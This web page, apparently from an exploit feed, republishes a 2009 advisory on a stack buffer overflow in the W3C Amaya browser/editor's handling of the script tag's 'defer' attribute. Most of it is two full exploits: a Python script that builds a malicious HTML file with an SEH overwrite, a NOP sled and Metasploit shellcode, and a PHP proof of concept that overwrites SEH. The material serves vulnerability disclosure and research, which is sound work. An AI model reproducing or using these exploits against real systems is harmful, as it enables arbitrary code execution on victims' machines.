|
Feeds -
Exploits
|
|
Written by Alfons Luja
|
|
Monday, 30 March 2009 22:19 |
W3C Amaya HTML 'script' Tag Buffer Overflow Vulnerability
-\\Bugtraq ID:
34295
-\\Class:
Boundary Condition Error
-\\CVE:
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Mar 30 2009 12:00AM
-\\Updated:
Mar 30 2009 08:36PM
-\\Credit:
Alfons Luja
-\\Vulnerable:
W3C Amaya 11.0.1
W3C Amaya 11.0.1
W3C Amaya 10.0.1
W3C Amaya 9.5
W3C Amaya 9.4
W3C Amaya 11.1
W3C Amaya 11.0
W3C Amaya 10.1
-\\Discussion
W3C Amaya is prone to a remote buffer-overflow vulnerability because the application
fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage this issue to execute arbitrary code in the context of the
application. Failed attacks will cause denial-of-service conditions.
Amaya 11.1 is vulnerable; other versions may also be affected.
-\\Exploit(s)/PoC(s):
The following exploits are available:
===============================================================
34295.py
^^^^^^^^^
# exploit.py
#
# Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Origninal Advisory:
# http://www.milw0rm.com/exploits/8314
#
# Fully Based on Rob Carter's Exploit
# http://www.milw0rm.com/exploits/7988
#
# Note:you need to upload Devil_inside.html to a remote host
# Works with windows xp sp2
#
# metasploit - run calc.exe
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x63"
"\x58\x30\x41\x30\x50\x41\x6b\x41\x41\x73\x32\x41\x42\x41\x32\x42"
"\x42\x30\x42\x42\x58\x42\x50\x38\x41\x42\x75\x4d\x39\x59\x6c\x4d"
"\x38\x42\x64\x33\x30\x37\x70\x47\x70\x4e\x6b\x52\x65\x65\x6c\x6e"
"\x6b\x41\x6c\x74\x45\x70\x78\x65\x51\x6a\x4f\x6c\x4b\x50\x4f\x74"
"\x58\x4c\x4b\x53\x6f\x55\x70\x46\x61\x4a\x4b\x72\x69\x6e\x6b\x35"
"\x64\x4c\x4b\x35\x51\x48\x6e\x66\x51\x4b\x70\x4a\x39\x6e\x4c\x4e"
"\x64\x4b\x70\x43\x44\x66\x67\x4b\x71\x4b\x7a\x44\x4d\x55\x51\x58"
"\x42\x58\x6b\x6c\x34\x77\x4b\x30\x54\x35\x74\x37\x74\x54\x35\x68"
"\x65\x4e\x6b\x31\x4f\x54\x64\x47\x71\x6a\x4b\x55\x36\x4e\x6b\x76"
"\x6c\x30\x4b\x4e\x6b\x51\x4f\x55\x4c\x35\x51\x7a\x4b\x4e\x6b\x45"
"\x4c\x4c\x4b\x46\x61\x48\x6b\x4f\x79\x53\x6c\x36\x44\x54\x44\x79"
"\x53\x30\x31\x6f\x30\x50\x64\x4c\x4b\x33\x70\x46\x50\x4f\x75\x6f"
"\x30\x70\x78\x34\x4c\x4e\x6b\x57\x30\x66\x6c\x4e\x6b\x50\x70\x35"
"\x4c\x4e\x4d\x6e\x6b\x52\x48\x53\x38\x4a\x4b\x53\x39\x4c\x4b\x4f"
"\x70\x6e\x50\x35\x50\x55\x50\x53\x30\x6e\x6b\x53\x58\x57\x4c\x53"
"\x6f\x74\x71\x7a\x56\x51\x70\x70\x56\x6f\x79\x39\x68\x4c\x43\x69"
"\x50\x43\x4b\x30\x50\x71\x78\x78\x70\x4f\x7a\x37\x74\x73\x6f\x75"
"\x38\x6c\x58\x6b\x4e\x4f\x7a\x56\x6e\x73\x67\x79\x6f\x4b\x57\x35"
"\x33\x35\x31\x32\x4c\x45\x33\x47\x70\x63")
chars = "\x41" * 6887
chars+= "\x74\x06\x41\x41" # jmp short 06
chars+= "\x17\x19\x10\x02" # 0x02101917 - pop pop ret in amaya module
chars+= "\x68\x7f\x01\x01\x7f" # push 7f01017f
chars+= "\x58" # pop eax
chars+= "\x2d\x18\x69\x45\x7d" # sub eax,7a7a0857
chars+= "\x50" # push eax
chars+= "\xc3" # retn
chars+= "\x90" * 100
chars+=shellcode
header= ('<script defer="'+chars+'">')
file=open('Devil_inside.html','w')
file.write(header)
file.close()
===============================================================
34295.php
^^^^^^^^^^
<?php
/**//*
Amaya 11.1 W3C's editor/browser
Stack Owerflow POC
Discover by Alfons Luja
Thx : OiN
select * from friends --
This stUff overwrite SEH in my box XP home sp 2
To correctly overwrite seh you must upload "remote_love.html" to remote server
Amaya allow only printable shellcode in this case
EAX:00000000
ECX:43434343
EDX:7C9037D8
EBX:00000000
ESP:0012DDD0
EBP:0012DDF0
ESI:00000000
EDI:00000000
EIP:43434343
*//**/
$junk = "\x41";
$n_seh = "\x42\x42\x42\x42"; //pointer to next seh
$h_seh = "\x43\x43\x43\x43"; //seh handler
for($i=1;$i<7000 - (4*19) - 10;$i++){ $junk.="\x41"; }
$junk.=$n_seh;
$junk.=$h_seh;
$hello = "<script defer=\"".$junk."\">";
$hnd = fopen("remote_love.html","w");
if($hnd){
fputs($hnd,$hello);
fclose($hnd);
echo"DONE !!\n";
} else {
echo"Kupa !!\n";
}
?>
-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or
if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s)
--Amaya Homepage
http://www.w3.org/Amaya (W3C)
|
